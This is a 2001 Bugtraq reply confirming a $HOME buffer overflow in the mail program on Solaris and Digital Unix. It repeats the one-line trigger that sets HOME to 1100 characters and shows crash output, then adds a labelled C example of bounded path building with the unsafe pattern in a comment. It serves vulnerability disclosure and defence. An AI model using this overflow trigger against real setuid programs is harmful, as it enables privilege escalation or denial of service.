Bugtraq mailing list archives
Re: $HOME buffer overflow in SunOS 5.8 x86
From: Gunnar Wolf <gwolf () campus iztacala unam mx>
Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)
> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> > $HOME buffer overflow in SunOS 5.8 x86
> >
> > Systems affected:
> > SunOS 5.8 x86 have not tested on other OSes
> >
> > Risk: Medium
> > Date: 4 June 2001
> >
> > Details:
> > HOME=`perl -e 'print "A"x1100'` ; export HOME
> > mail a
> > CTL-C
> > eip gets smashed with 0x41414141.
>
> 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
> 0:jpmeier@sol:/home/jpmeier> mail a
> ^Cmail: Mail saved in dead.letter
> 1:jpmeier@sol:/home/jpmeier> uname -a
> SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
>
> also tried larger buffers. Solaris/sparc appears not vulnerable.
> Maybe it's an x86 bug only

Solaris 7/Sparc is vulnerable:

[gwolf@sun gwolf]$ uname -a
SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10
[gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME
[gwolf@sun gwolf]$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(...)

Digital Unix V4.0C is vulnerable:

digital> uname -a
OSF1 digital V4.0 564.32 alpha
digital> setenv HOME `perl -e 'print "a"x1100'`
Received disconnect: Command terminated on signal 6.
[and I am logged out of the machine]

I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha and
Debian GNU/Linux 2.2r3/i386, and they are not vulnerable.

------------------------------------------------------------
Gunnar Wolf - gwolf () campus iztacala unam mx - (+52)5623-1119
Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM
Departamento de Seguridad en Computo - DGSCA - UNAM
------------------------------------------------------------
Quidquid latine dictum sit, altum viditur.
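
Added example, not part of the original post and not the source of mail(1), which the thread does not show. It assumes the overflow class reported above is an unchecked copy of $HOME into a fixed-size buffer while building a path such as the dead.letter file seen in the quoted session, and shows a bounded form that rejects an oversized value instead of truncating it. PATH_BUF and build_home_path are hypothetical names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 256  /* assumed fixed buffer size, for illustration only */

/* Unsafe pattern (assumed, shown only for contrast):
 *     char path[PATH_BUF];
 *     sprintf(path, "%s/dead.letter", getenv("HOME"));
 * An 1100-byte $HOME writes far past the end of path. */

/* Build "<home>/<leaf>" into out.
 * Returns 0 on success; -1 if home is unset, empty, not an absolute path,
 * or the result would not fit. The value is never silently truncated,
 * because a truncated path can point at a different file. */
int build_home_path(const char *home, const char *leaf, char *out, size_t outsz)
{
    int n;

    if (home == NULL || home[0] != '/' || leaf == NULL || outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s/%s", home, leaf);
    if (n < 0 || (size_t)n >= outsz) {   /* encoding error or would truncate */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[PATH_BUF];

    /* HOME is attacker-controlled input for any setuid/setgid program. */
    if (build_home_path(getenv("HOME"), "dead.letter", path, sizeof path) != 0) {
        fprintf(stderr, "demo: HOME unset, relative, or too long; refusing\n");
        return 1;
    }
    printf("would save to %s\n", path);
    return 0;
}
```

Run with the 1100-character HOME from the thread, the program exits with status 1 instead of writing past the buffer.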